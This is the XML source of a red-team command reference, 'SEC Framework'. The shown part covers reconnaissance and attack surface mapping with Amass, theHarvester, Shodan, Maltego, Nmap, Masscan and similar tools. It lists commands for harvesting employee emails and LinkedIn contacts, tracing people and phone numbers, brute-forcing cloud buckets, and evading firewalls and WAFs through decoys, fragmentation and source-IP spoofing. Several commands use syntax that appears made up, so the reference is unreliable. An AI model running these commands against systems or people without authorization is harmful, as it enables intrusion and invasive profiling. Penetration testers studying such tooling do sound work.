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18aa9cee706f40de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f350ac9be6bf44a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400" w:right="1200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="c2510c"/>
          <w:spacing w:val="60"/>
          <w:sz w:val="96"/>
        </w:rPr>
        <w:t>SEC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:ind w:left="1400" w:right="1200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="4a4a4a"/>
          <w:spacing w:val="30"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>FRAMEWORK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="1400"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7a7a7a"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>10 Phases  |  100 Tools  |  1000 Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="1400"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7a7a7a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Red Team Operations &amp; Adversary Simulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="1400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7a7a7a"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>June 2026  |  For Authorized Security Testing Only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of Contents</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc000" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7a7a7a"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Right-click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Phase 1: Reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 2: Attack Surface Mapping</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 3: Initial Access</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>23</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 4: Payload Delivery</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>33</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 5: Privilege Escalation</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>43</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 6: Credential Access</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>53</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 7: Lateral Movement</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>63</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 8: Persistence &amp; Defense Evasion</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>73</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 9: Actions on Objectives</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>83</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 10: Wireless Hacking</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>93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1: Reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff6b35"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>  [★★★★★]</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc001" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>The systematic process of collecting intelligence about a target organization, infrastructure, personnel, and digital footprint to identify potential attack vectors and entry points.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Amass</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc001_01" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>In-depth attack surface mapping and external asset discovery tool that performs extensive DNS enumeration, certificate transparency log scraping, and internet archive querying.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Passive Intel Collection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intel -d $DOMAIN -whois -src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Active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enum -active -d $DOMAIN -ip -src -dir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Deep Recursive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enum -brute -w $WORDLIST -d $DOMAIN -min-for-recursive 2 -dir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ASN &amp; IP Range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intel -org '$ORG_NAME' -active -ip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Certificate Transparency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enum -active -cidr $CIDR -d $DOMAIN -src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Data Sources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enum -d $DOMAIN -config $CONFIG_FILE -include $DATASOURCES -dir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Intel Tracking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track -d $DOMAIN -dir $OUTPUT_DIR -last 5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Database Visualization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viz -d $DOMAIN -dir $OUTPUT_DIR -maltego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Enumeration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enum -passive -d $DOMAIN -noalts -norecursive -src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Scope Management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amass enum -d $DOMAIN -bl $BLACKLIST_FILE -blf $BLACKLIST_IPS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theHarvester</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc001_02" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Email harvesting, subdomain discovery, and open-source intelligence gathering tool that queries search engines, PGP servers, and social networks.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OSINT Sweep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-b all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Email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-b google,bing,yahoo,duckduckgo -l 500 -f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Subdomain via Certs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-b censys,certspotter,crtsh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LinkedIn Contact Harvest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-b linkedin -l 1000 -f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GitHub Code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-b github -l 500 -f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Shodan Integration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-b shodan --shodan-api $SHODAN_KEY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Brute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-c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Virtual Host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-v $IP_ADDRESS -b bing,google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Takeover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-t -f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Limitless Deep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theHarvester -d $DOMAIN -b all -l 10000 -c -t -f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Shodan</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc001_03" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Internet-wide scanner and search engine for discovering exposed devices, services, vulnerabilities, and misconfigurations across the global attack surface.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Host Detailed View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host $IP_ADDRESS --history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Domain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domain $DOMAIN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Search Query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search '$QUERY' --fields ip_str,port,hostnames,org,os --limit $LIMIT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SSL Certificate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search 'ssl.cert.subject.cn:$DOMAIN' --fields ip_str,port,ssl.version,ssl.cipher.name --limit 1000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Vulnerability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search 'vuln:$CVE_ID country:$COUNTRY_CODE' --fields ip_str,port,org,vuln --limit $LIMIT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Network Range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search 'net:$CIDR' --fields ip_str,port,hostnames,os --limit 1000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Organization Assets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search 'org:"$ORG_NAME"' --fields ip_str,port,hostnames,product --limit 1000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Banner Grab Analysis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search '$QUERY' --fields ip_str,port,data --limit $LIMIT --format json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ICS/SCADA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search 'tag:ics country:$COUNTRY_CODE' --fields ip_str,port,product,location --limit 1000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Count Statistics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shodan count '$QUERY' &amp;&amp; shodan stats --facets org,country,port,os '$QUERY'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Maltego</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc001_04" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Visual link analysis and intelligence platform for mapping relationships between domains, IPs, emails, social profiles, and infrastructure components.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Domain Transform Run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-t $TRANSFORM_SET -e $DOMAIN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Infrastructure Map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-i $DOMAIN -transforms 'DNSfromDomain,NetblockToAS,IPToNetblock'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Email Recon Chain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-e $EMAIL -transforms 'EmailToDomain,EmailToURL,EmailToSocial'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Person Investigation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-p '$FULL_NAME' -transforms 'PersonToEmail,PersonToURL,PersonToSocial'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Phishing Domain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-d $DOMAIN -transforms 'DomainToSimilarDomain,DomainToTyposquat'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SSL Certificate Map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-i $IP_ADDRESS -transforms 'IPToSSLCert,SSLCertToDomain'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Social Network Graph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-s '$SOCIAL_HANDLE' -platform $PLATFORM -transforms all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Dark Web Mention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-d $DOMAIN -transforms 'DomainToDarkWebMention'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Technology Stack ID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-u $URL -transforms 'URLToTechStack,URLToFramework'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Batch Entity Process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maltego -f $ENTITY_LIST_FILE -transforms all -o $OUTPUT_DIR -format json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Waybackurls + Gau</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc001_05" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>URL enumeration tools that extract historical endpoints, parameters, and file paths from the Wayback Machine and multiple archive sources for hidden asset discovery.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Deep URL Extraction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gau --threads 20 --subs --providers wayback,otx,commoncrawl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Parameter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gau | grep -E '\?[a-zA-Z0-9]+=' | sort -u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JavaScript File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gau | grep -E '\.js$' | sort -u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Backup File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gau | grep -iE '\.(bak|zip|tar|gz|sql|dump|backup)' | sort -u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Sensitive Endpoint Find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gau | grep -iE '(api|admin|config|debug|test|dev|staging|internal)' | sort -u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Wayback Machine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waybackurls $DOMAIN | unfurl -u keys | sort -u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Robots.txt Historical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waybackurls $DOMAIN | grep '/robots.txt' | sort -u | while read url; do curl -s '$url' 2&gt;/dev/null; done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JSON Endpoint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gau | grep -E '\.json$' | sort -u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High-Value File Extraction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gau | grep -iE '\.(pdf|doc|docx|xls|xlsx|csv|env|git)' | sort -u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Pipeline Recon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gau --threads 30 --subs | uro | httpx -silent -status-code -tech-detect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OSINT Framework Tools</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc001_06" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Collection of open-source intelligence utilities including email-finder, hunter.io CLI, and Sherlock for comprehensive digital footprint mapping of targets.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Email Pattern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hunter domain $DOMAIN --api-key $API_KEY | jq -r '.data.emails[] | .value'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Email Verification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hunter email-verify $EMAIL --api-key $API_KEY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Username Social Sweep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sherlock $USERNAME --timeout 5 --output $OUTPUT_DIR --site $PLATFORM_LIST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Social Presence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sherlock $USERNAME --timeout 10 --output $OUTPUT_DIR --csv --folderoutput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Subdomain from Emails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hunter domain $DOMAIN --api-key $API_KEY | jq -r '.data.pattern, .data.emails[].sources[].domain' | sort -u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Author Leak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email2json $EMAIL | jq -r '.leaks[] | .source, .date'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Corporate Intel Gather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hunter domain-search $DOMAIN --api-key $API_KEY --limit 100 --offset 0 | tee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Phone Number Lookup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phoneinfoga scan -n $PHONE_NUMBER --output json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GitHub User Recon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gh recon $GITHUB_USER --repos --gists --followers --following --events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Domain Contact Extraction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whois $DOMAIN | grep -iE 'Registrant|Admin|Tech|Email|Phone|Name' | sort -u &gt;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Recon-ng</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc001_07" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Full-featured reconnaissance framework with modular architecture for automated web reconnaissance, contact discovery, and credential leak detection.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Workspace Init &amp; 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-w $WORKSPACE -C 'marketplace install all' -C 'modules load recon/domains-hosts/brute_hosts'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Domain Host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select $WORKSPACE' -C 'db insert domains $DOMAIN' -C 'modules load recon/domains-hosts/brute_hosts' -C 'run'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Contact Harvest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select $WORKSPACE' -C 'db insert domains $DOMAIN' -C 'modules load recon/domains-contacts/whois_pocs' -C 'run'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Credential Leak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select $WORKSPACE' -C 'modules load recon/contacts-credentials/hibp_breach' -C 'options set SOURCE $EMAIL' -C 'run'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IP Geolocation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select $WORKSPACE' -C 'modules load recon/hosts-hosts/ipstack' -C 'options set SOURCE $IP_ADDRESS' -C 'run'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Reverse WHOIS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select $WORKSPACE' -C 'modules load recon/domains-domains/whois_reverse' -C 'options set SOURCE $DOMAIN' -C 'run'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SSL Certificate Enum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select $WORKSPACE' -C 'modules load recon/domains-hosts/ssl_san' -C 'options set SOURCE $DOMAIN' -C 'run'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Shodan Host Module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select $WORKSPACE' -C 'modules load recon/hosts-ports/shodan_ip' -C 'options set SOURCE $IP_ADDRESS' -C 'keys add shodan_api $API_KEY' -C 'run'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Report Generation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select $WORKSPACE' -C 'modules load reporting/html' -C 'options set CREATOR $AUTHOR' -C 'options set CUSTOMER $CLIENT' -C 'run'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Domain Recon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recon-ng -C 'workspaces create $WORKSPACE' -C 'db insert domains $DOMAIN' -C 'marketplace install all' -C 'modules load recon/domains-hosts/' -C 'run' -C 'modules load recon/hosts-ports/' -C 'run'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CloudEnum</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc001_08" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Multi-cloud OSINT tool for enumerating public resources across AWS, Azure, and GCP including storage buckets, databases, and container registries.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AWS Full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-qs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Azure Resource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-azure -qs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GCP Project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-gcp -qs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Permutation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-k $PERMUTATION_FILE -qs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Brute Force Buckets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-brute -t 50 --json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AWS Lambda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-aws -lambda -qs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Container Registry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-aws -ecr -azure -acr -gcp -gcr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CloudFront Distribution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-aws -cloudfront -qs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Azure Blob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-azure -blob -qs --json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Multi-Cloud Full Sweep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cloudenum.py --keyword $KEYWORD -aws -azure -gcp -k $PERMUTATION_FILE -brute -t 100 --json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SpiderFoot</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc001_09" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Automated OSINT aggregation platform that integrates with over 200 modules to correlate and analyze intelligence from diverse sources.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Scan Launch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$TARGET_NAME -m sfp_spider,sfp_dns,sfp_whois,sfp_shodan,sfp_clearbit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Domain-Focused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$DOMAIN -t DOMAIN_NAME -m sfp_dns,sfp_ssl,sfp_subdomain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IP Address Investigation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$IP_ADDRESS -t IP_ADDRESS -m sfp_shodan,sfp_censys,sfp_ipinfo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Email Intelligence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$EMAIL -t EMAILADDR -m sfp_hibp,sfp_clearbit,sfp_emailformat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Human Name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'$HUMAN_NAME' -t HUMAN_NAME -m sfp_social,sfp_clearbit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Phone Number Trace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$PHONE_NUMBER -t PHONE_NUMBER -m sfp_numverify,sfp_truecaller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Username Correlation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$USERNAME -t USERNAME -m sfp_accounts,sfp_social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Bitcoin Address Trace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$BTC_ADDRESS -t BITCOIN_ADDRESS -m sfp_bitcoin,sfp_blockchain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Netblock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-s $CIDR -t NETBLOCK_OWNER -m sfp_dns,sfp_shodan,sfp_censys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API Server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sf.py -l 127.0.0.1:5001 -u $USERNAME:$PASSWORD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DarkSearch</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc001_10" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Dark web intelligence and monitoring tool for tracking mentions, leaked credentials, and illicit activity related to target domains or organizations.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Domain Mention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'$DOMAIN' --output json --limit $LIMIT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Credential Leak Monitor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'$EMAIL' --type leak --output json --limit 100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Organization Threat Intel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'$ORG_NAME' --type forum --output json --limit 200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Dark Web Store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'$KEYWORD' --type store --output json --sort date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Paste Site Monitor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'$DOMAIN' --type paste --output json --monitor --interval 3600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Ransomware Victim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'$DOMAIN' --type ransomware --output json --limit 50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Continuous Monitoring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'$KEYWORD' --monitor --output json --webhook $WEBHOOK_URL --interval 1800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API Key Exposure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'api_key $DOMAIN' --type paste --output json --limit 100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Employee Data Leak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'$ORG_NAME employee' --type all --output json --limit 200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IOC Tracking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darksearch --query '$IOC_HASH' --type malware --output json --limit 50 &gt; $OUTPUT_FILE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2: Attack Surface Mapping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff6b35"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>  [★★★★★]</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc002" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Comprehensive mapping of the target's exposed infrastructure, services, ports, technologies, and potential entry points to create a complete attack topology.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Nmap</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc002_01" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The industry-standard network discovery and security auditing tool with powerful NSE scripting capabilities for advanced service detection and vulnerability scanning.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Stealth SYN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-sS -p- --open --min-rate 1000 -T4 $TARGET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Service Version Detection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-sV -sC -O -A --version-intensity 9 -p $PORTS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Vulnerability NSE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-sV --script vuln,vulners,exploit -p $PORTS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TCP/UDP Combo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-sS -sU -p T:$TCP_PORTS,U:$UDP_PORTS --open -T4 $TARGET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Aggressive Timing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-sS -p- --open -T5 --min-parallelism 100 --max-retries 2 $TARGET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Script Category Sweep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-sV --script 'safe and default' -p $PORTS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OS Fingerprinting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-O --osscan-guess --max-os-tries 2 -p $PORTS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Top Ports Quick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-sS --top-ports 1000 --open --version-all -T4 $TARGET_CIDR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Traceroute Path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-sS -p 80,443 --traceroute --reason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NSE Firewall Bypass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nmap -sS -f --mtu 16 --data-length 24 --randomize-hosts -D RND:10 -p $PORTS $TARGET -oN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Masscan</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc002_02" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Ultra-fast asynchronous TCP port scanner capable of scanning the entire IPv4 internet in under 5 minutes, ideal for wide-scale attack surface discovery.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Port Blitz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$TARGET_CIDR -p0-65535 --rate 10000 -oJ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Top Service Ports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$TARGET_CIDR -p21-25,53,80,110,143,443,3306,3389,5432,5900,8080,8443 --rate 20000 -oJ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Banner Grab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$TARGET_CIDR -p$PORTS --banners --rate 5000 -oJ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Single Host Deep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$IP_ADDRESS -p0-65535 --rate 50000 --wait 5 -oJ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Exclude File Support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$TARGET_CIDR --excludefile $EXCLUDE_FILE -p0-65535 --rate 10000 -oJ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Resume Capability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$TARGET_CIDR -p0-65535 --rate 10000 --resume $STATE_FILE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ICMP Host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$TARGET_CIDR --ping --rate 50000 -oJ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Source IP Spoofing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$TARGET_CIDR -p$PORTS --rate 10000 --adapter-ip $SPOOF_IP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Seed for Randomization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$TARGET_CIDR -p0-65535 --rate 10000 --seed $SEED_VALUE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Range to Port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masscan $IP_RANGE -p$(cat $PORT_LIST | tr '\n' ',') --rate 15000 -oJ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Naabu</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc002_03" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fast, modern port scanner written in Go with automatic host discovery, CDN exclusion, and Nmap integration for streamlined attack surface enumeration.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Fast Top Port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 -top-ports 100 -timeout 5000 -rate 1000 -o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Port Range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 -p - -timeout 10000 -rate 5000 -stats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CDN Exclusion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 -p $PORTS -exclude-cdn -timeout 5000 -o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Nmap Integration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 -p - -nmap-cli 'nmap -sV -sC -oN $OUTPUT_NMAP'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Host Discovery First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$TARGET_CIDR -p $PORTS -sn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Passive Port Enum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 -p $PORTS -passive -timeout 10000 -o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 Input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-list $HOSTS_FILE -p $PORTS -rate 5000 -timeout 5000 -o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Silent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 -p $PORTS -silent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Stream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 -p $PORTS -json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Resume &amp; Optimize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naabu -host $TARGET -p - -rate 10000 -timeout 3000 -retries 2 -warm-up-time 1 -o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HTTPX</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc002_04" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lightning-fast, multi-purpose HTTP prober with built-in discovery capabilities for web technologies, CDNs, WAFs, and server fingerprinting.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Live Host Probe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$HOSTS_FILE | httpx -silent -status-code -title -tech-detect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Metadata Extract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httpx -l $HOSTS_FILE -json -status-code -title -web-server -tech-detect -method -ip -cname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Screenshot Capture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$HOSTS_FILE | httpx -silent -ss -srd $SCREENSHOT_DIR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Content Probing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$HOSTS_FILE | httpx -mc 200,301,302,401,403,500 -path $CUSTOM_PATH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Favicon Hash Match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httpx -l $HOSTS_FILE -favicon -jarm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TLS Certificate Probe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httpx -l $HOSTS_FILE -tls-grab -tls-probe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Response Body Match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$HOSTS_FILE | httpx -silent -body-preview 100 -match-string '$SEARCH_STRING'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CDN &amp; Cloud Detect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httpx -l $HOSTS_FILE -cdn -location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 Method Testing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httpx -l $HOSTS_FILE -x GET,POST,PUT,DELETE,PATCH -mc 200 -o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Pipeline Chain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subfinder -d $DOMAIN | dnsx | naabu -p 80,443,8080,8443 | httpx -tech-detect -title -status-code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WhatWeb</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc002_05" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Next-generation web scanner that identifies technologies, frameworks, CMS platforms, JavaScript libraries, and over 1800 plugins for precise fingerprinting.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Aggressive Fingerprint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-a 3 $TARGET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Stealth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-a 1 $TARGET --user-agent '$USER_AGENT'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Plugin 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-p $PLUGIN_LIST $TARGET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 Scan with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-i $HOSTS_FILE --proxy $PROXY_URL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Plugin Custom Aggression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-p +$PLUGIN --custom-plugin-aggression $LEVEL $TARGET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Follow Redirects Deep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-a 4 $TARGET --follow-redirect=always --max-redirects=10 --log-json=$OUTPUT_FILE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Header Analysis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-a 3 $TARGET --header '$CUSTOM_HEADER'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Cookie Fingerprint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-a 3 $TARGET --cookie '$COOKIE_STRING'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Basic Auth Bypass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-a 4 $TARGET --basic-auth $USER:$PASS --log-json=$OUTPUT_FILE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Recursive Spider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whatweb -a 4 $TARGET --max-links 50 --recursion 2 --log-json=$OUTPUT_FILE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WafW00f</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc002_06" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Web Application Firewall detection and fingerprinting tool that identifies over 70 WAF products to tailor bypass strategies.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WAF Detection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$TARGET -a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Find All WAFs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$TARGET --findall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 WAF Signatures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-l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Header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$TARGET -H '$CUSTOM_HEADER'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Proxy Chain WAF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$TARGET -p $PROXY_URL -a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Request File Import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$TARGET -i $REQUEST_FILE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Subdomain WAF Sweep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$SUBDOMAIN_FILE | xargs -I {} wafw00f {} -a &gt;&gt;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Verbose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$TARGET -vv -a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JSON Output Format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$TARGET -j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CloudFlare Specific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wafw00f $TARGET --cloudflare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ASNmap</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc002_07" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Go-based tool for mapping Autonomous System Numbers to IP ranges, CIDR blocks, and cloud provider allocations for network perimeter identification.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ASN to IP Ranges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asnmap -a $ASN_NUMBER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Domain ASN Lookup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asnmap -d $DOMAIN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Organization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asnmap -org '$ORG_NAME'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IP to ASN Reverse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asnmap -i $IP_ADDRESS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Cloud Provider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asnmap -d $DOMAIN -cloud aws,google,azure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CIDR Expansion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asnmap -a $ASN_NUMBER -json | jq -r '.[].cidr'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Bulk ASN Processing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$ASN_LIST_FILE | xargs -I {} asnmap -a {} -o $OUTPUT_DIR/{}.txt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Silent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asnmap -d $DOMAIN -silent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IP Range Format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asnmap -a $ASN_NUMBER -ip-format prefix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Stream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$DOMAIN | asnmap -d -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CloudBrute</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc002_08" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Cloud infrastructure discovery tool that brute-forces cloud storage buckets, applications, and databases across AWS, Azure, GCP, and DigitalOcean.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Cloud Sweep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 -m $MODE -t $THREADS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AWS Bucket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 -m storage -p aws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Azure App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 -m app -p azure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GCP Project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 -m storage -p gcp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Docker Registry Probe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 -m registry -p docker -t 50 -o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Database Endpoint Find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 -m database -p all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Wordlist Permutation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 -w $WORDLIST -m storage -p all -t 200 -o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Keyword File Input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$KEYWORD_FILE -m all -p all -t 200 -o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Silent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$DOMAIN -k $KEYWORD -m storage -p aws,azure,gcp -silent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IP-based Cloud Enum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cloudbrute -d $IP_ADDRESS -k $KEYWORD -m all -p all -t 100 -o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GitDorker</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc002_09" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
